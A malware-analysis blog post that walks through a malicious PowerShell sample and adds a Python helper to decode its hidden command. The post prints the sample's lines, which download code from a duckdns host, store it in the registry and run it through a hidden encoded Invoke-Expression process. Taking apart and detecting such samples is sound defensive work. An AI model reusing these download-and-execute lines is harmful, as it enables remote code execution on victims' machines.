Analysis of Malicious PowerShell, Part 2
In this article, we will analyze another PowerShell file that is used to download and run malware.
Sample link: https://bazaar.abuse.ch/sample/cf0aea3ef14b4587489a9163ee8840f2e388fd0f928f9d5f60d31582a69a9d1f/
Malicious PowerShell code:
#$url = "https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt"
#$url = "https://firefoxmozilla.duckdns.org/run_encrypted.ps1"
#$webClient = New-Object System.Net.WebClient
#$base64Code = $webClient.DownloadString($url)
#Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows Search" -Name '$phantom-frZZf' -Value $base64Code -Type String
#$d=((new-object Net.WebClient).DownloadString("https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt"));
Start-Process powershell -WindowStyle Hidden -ArgumentList "-ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAd#wBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgAnACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUA#ByAG8AcABlAHIAdAB5ACAAYAAkAHAAaABhAG4AdABvAG0ALQBmAHIAWgBaAGYAKQA=
Malicious PowerShell analysis:
1- The malware developer declares a variable holding the URL of the encrypted base64 file: #$url = "https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt".
2- The malware developer declares a second URL variable pointing at the encrypted base64 PowerShell file: #$url = "https://firefoxmozilla.duckdns.org/run_encrypted.ps1".
3- The malware developer sets up a WebClient object to interact with those URLs: #$webClient = New-Object System.Net.WebClient.
4- The malware developer declares a variable that downloads the encrypted base64 and ps1 file: #$base64Code = $webClient.DownloadString($url).
5- The malware developer stores the encoded base64 in a registry value: #Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows Search" -Name '$phantom-frZZf' -Value $base64Code -Type String.
6- The malware developer downloads the encrypted base64 file: #$d=((new-object Net.WebClient).DownloadString("https://firefoxmozilla.duckdns.org/run_encrypted_base64.txt"));
7- The malware developer executes the encoded base64 command in a hidden PowerShell process: Start-Process powershell -WindowStyle Hidden -ArgumentList "-ec aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAd#wBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgAnACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUA#ByAG8AcABlAHIAdAB5ACAAYAAkAHAAaABhAG4AdABvAG0ALQBmAHIAWgBaAGYAKQA=
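To see what the hidden PowerShell process in step 7 actually runs, the -ec argument can be decoded offline. The following is an added Python helper written for this post, not code from the sample or from any tool it uses, and it assumes only the Python standard library: the -ec value is base64 over the UTF-16LE form of the script, so the decoder strips the two '#' breaks present in the listing, decodes, and then pulls out the registry path, value name and cmdlets that a detection rule would key on.

```python
"""Decode the -ec (-EncodedCommand) value from the Start-Process line above.
Added analysis helper for this post, not code taken from the sample."""
import base64
import re

# The -ec value exactly as printed in the listing, including the two '#'
# characters that break the string in the published copy.
ENCODED_COMMAND = (
    "aQBOAFYAbwBLAGUALQBlAFgAcABSAGUAUwBzAEkAbwBuACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMAbwBmAHQAd#wBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAFMAZQBhAHIAYwBoACcAIAAtAE4AYQBtAGUAIAAnACQAcABoAGEAbgB0AG8AbQAtAGYAcgBaAFoAZgAnACkAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUA#ByAG8AcABlAHIAdAB5ACAAYAAkAHAAaABhAG4AdABvAG0ALQBmAHIAWgBaAGYAKQA="
)


def decode_encoded_command(blob: str) -> str:
    """Return the script hidden in a PowerShell -EncodedCommand value.
    PowerShell base64-encodes the UTF-16LE form of the script (every second
    byte is 0x00). Non-base64 characters ('#' breaks, pasted whitespace) are
    dropped before decoding."""
    cleaned = re.sub(r"[^A-Za-z0-9+/=]", "", blob)
    return base64.b64decode(cleaned).decode("utf-16-le")


def extract_indicators(script: str) -> dict:
    """Collect registry path, value name and cmdlets from a decoded script.
    Cmdlets are lower-cased because the sample randomises case
    ("iNVoKe-eXpReSsIon") to defeat naive substring matching; the lookbehind
    stops the '$phantom-frZZf' value name being taken for a cmdlet."""
    cmdlets = re.findall(r"(?<![\w$`])([A-Za-z]+-[A-Za-z]+)", script)
    cmdlets = sorted({c.lower() for c in cmdlets})
    return {
        "registry_paths": re.findall(r"HK(?:CU|LM|CR|U|CC):\\[^'\"]+", script),
        "value_names": re.findall(r"-Name\s+'([^']+)'", script),
        "cmdlets": cmdlets,
        "uses_invoke_expression": "invoke-expression" in cmdlets,
    }


if __name__ == "__main__":
    decoded = decode_encoded_command(ENCODED_COMMAND)
    print(decoded)
    for key, value in extract_indicators(decoded).items():
        print(f"{key}: {value}")
```

Decoding shows that the launched command reads the '$phantom-frZZf' value back from HKCU:\Software\Microsoft\Windows Search and hands it to Invoke-Expression, which is what ties step 5 (the registry write) to step 7 (the hidden execution).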